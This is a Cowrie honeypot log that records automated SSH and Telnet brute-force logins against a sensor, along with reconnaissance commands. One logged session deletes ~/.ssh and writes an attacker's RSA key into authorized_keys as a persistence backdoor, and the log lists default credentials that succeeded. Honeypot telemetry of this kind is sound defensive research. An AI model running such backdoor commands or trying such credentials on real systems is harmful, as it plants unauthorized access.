{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:55:38.667398Z","src_ip":"212.227.125.160","session":"dd5f6766cc7c"}
{"eventid":"cowrie.login.success","username":"root","password":"Password64","message":"login attempt [root/Password64] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:55:39.129348Z","src_ip":"212.227.125.160","session":"dd5f6766cc7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:55:39.476744Z","src_ip":"212.227.125.160","session":"dd5f6766cc7c"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-26T19:55:39.477799Z","src_ip":"212.227.125.160","session":"dd5f6766cc7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:55:39.606289Z","src_ip":"212.227.125.160","session":"dd5f6766cc7c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:55:39.607538Z","src_ip":"212.227.125.160","session":"dd5f6766cc7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46004,"dst_ip":"1.2.3.4","dst_port":23,"session":"dc294c1760e1","protocol":"telnet","message":"New connection: 212.227.235.229:46004 (1.2.3.4:23) [session: dc294c1760e1]","sensor":"my-vps","timestamp":"2025-08-26T19:55:43.414973Z"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":57458,"dst_ip":"1.2.3.4","dst_port":23,"session":"5b350a67b10a","protocol":"telnet","message":"New connection: 79.124.8.120:57458 (1.2.3.4:23) [session: 5b350a67b10a]","sensor":"my-vps","timestamp":"2025-08-26T19:55:44.474974Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:55:44.515039Z","src_ip":"79.124.8.120","session":"5b350a67b10a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:55:44.591835Z","src_ip":"79.124.8.120","session":"5b350a67b10a"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":50404,"dst_ip":"1.2.3.4","dst_port":22,"session":"e03f54274847","protocol":"ssh","message":"New connection: 217.154.1.158:50404 (1.2.3.4:22) [session: e03f54274847]","sensor":"my-vps","timestamp":"2025-08-26T19:55:53.501226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:55:53.502286Z","src_ip":"217.154.1.158","session":"e03f54274847"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:55:53.516888Z","src_ip":"217.154.1.158","session":"e03f54274847"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd","message":"login attempt [root/P@55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:55:53.559669Z","src_ip":"217.154.1.158","session":"e03f54274847"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:55:53.607026Z","src_ip":"217.154.1.158","session":"e03f54274847"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:55:53.607867Z","src_ip":"217.154.1.158","session":"e03f54274847"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:55:53.635853Z","src_ip":"217.154.1.158","session":"e03f54274847"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:55:53.637092Z","src_ip":"217.154.1.158","session":"e03f54274847"}
{"eventid":"cowrie.session.closed","duration":23.05168056488037,"message":"Connection lost after 23 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:56:06.466578Z","src_ip":"212.227.235.229","session":"dc294c1760e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55672,"dst_ip":"1.2.3.4","dst_port":22,"session":"3304091c7f22","protocol":"ssh","message":"New connection: 212.227.235.229:55672 (1.2.3.4:22) [session: 3304091c7f22]","sensor":"my-vps","timestamp":"2025-08-26T19:56:07.220668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:56:07.221669Z","src_ip":"212.227.235.229","session":"3304091c7f22"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T19:56:07.429116Z","src_ip":"212.227.235.229","session":"3304091c7f22"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"123456","message":"login attempt [frappe/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:56:08.052647Z","src_ip":"212.227.235.229","session":"3304091c7f22"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:56:09.261661Z","src_ip":"212.227.235.229","session":"3304091c7f22"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":48330,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c468fcd4109","protocol":"ssh","message":"New connection: 217.154.1.158:48330 (1.2.3.4:22) [session: 0c468fcd4109]","sensor":"my-vps","timestamp":"2025-08-26T19:56:11.085638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:56:11.087147Z","src_ip":"217.154.1.158","session":"0c468fcd4109"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:56:11.101071Z","src_ip":"217.154.1.158","session":"0c468fcd4109"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:56:11.143889Z","src_ip":"217.154.1.158","session":"0c468fcd4109"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:56:11.256518Z","src_ip":"217.154.1.158","session":"0c468fcd4109"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:56:11.257192Z","src_ip":"217.154.1.158","session":"0c468fcd4109"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:56:11.272398Z","src_ip":"217.154.1.158","session":"0c468fcd4109"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:56:11.273255Z","src_ip":"217.154.1.158","session":"0c468fcd4109"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":50474,"dst_ip":"1.2.3.4","dst_port":22,"session":"473955d9ecc5","protocol":"ssh","message":"New connection: 199.195.248.191:50474 (1.2.3.4:22) [session: 473955d9ecc5]","sensor":"my-vps","timestamp":"2025-08-26T19:56:12.470706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:56:12.483183Z","src_ip":"199.195.248.191","session":"473955d9ecc5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:56:12.575968Z","src_ip":"199.195.248.191","session":"473955d9ecc5"}
{"eventid":"cowrie.login.success","username":"root","password":"0001","message":"login attempt [root/0001] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:56:12.946089Z","src_ip":"199.195.248.191","session":"473955d9ecc5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:56:13.234993Z","src_ip":"199.195.248.191","session":"473955d9ecc5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:56:13.235662Z","src_ip":"199.195.248.191","session":"473955d9ecc5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:56:13.236535Z","src_ip":"199.195.248.191","session":"473955d9ecc5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:56:13.335020Z","src_ip":"199.195.248.191","session":"473955d9ecc5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:56:13.537916Z","src_ip":"199.195.248.191","session":"473955d9ecc5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:56:13.538779Z","src_ip":"199.195.248.191","session":"473955d9ecc5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:56:13.633227Z","src_ip":"199.195.248.191","session":"473955d9ecc5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:56:13.634168Z","src_ip":"199.195.248.191","session":"473955d9ecc5"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":51128,"dst_ip":"1.2.3.4","dst_port":22,"session":"f94eed6a8e3f","protocol":"ssh","message":"New connection: 199.195.248.191:51128 (1.2.3.4:22) [session: f94eed6a8e3f]","sensor":"my-vps","timestamp":"2025-08-26T19:56:13.718255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:56:13.730699Z","src_ip":"199.195.248.191","session":"f94eed6a8e3f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:56:13.815910Z","src_ip":"199.195.248.191","session":"f94eed6a8e3f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:56:14.181758Z","src_ip":"199.195.248.191","session":"f94eed6a8e3f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:56:15.279466Z","src_ip":"199.195.248.191","session":"f94eed6a8e3f"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":51756,"dst_ip":"1.2.3.4","dst_port":22,"session":"06271cf33c43","protocol":"ssh","message":"New connection: 199.195.248.191:51756 (1.2.3.4:22) [session: 06271cf33c43]","sensor":"my-vps","timestamp":"2025-08-26T19:56:15.364686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:56:15.372832Z","src_ip":"199.195.248.191","session":"06271cf33c43"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:56:15.458189Z","src_ip":"199.195.248.191","session":"06271cf33c43"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:56:15.812217Z","src_ip":"199.195.248.191","session":"06271cf33c43"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:56:15.907644Z","src_ip":"199.195.248.191","session":"473955d9ecc5"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:56:15.908552Z","src_ip":"199.195.248.191","session":"06271cf33c43"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":55338,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2eb7f16d4fb","protocol":"ssh","message":"New connection: 217.154.1.158:55338 (1.2.3.4:22) [session: d2eb7f16d4fb]","sensor":"my-vps","timestamp":"2025-08-26T19:56:28.554244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:56:28.555247Z","src_ip":"217.154.1.158","session":"d2eb7f16d4fb"}
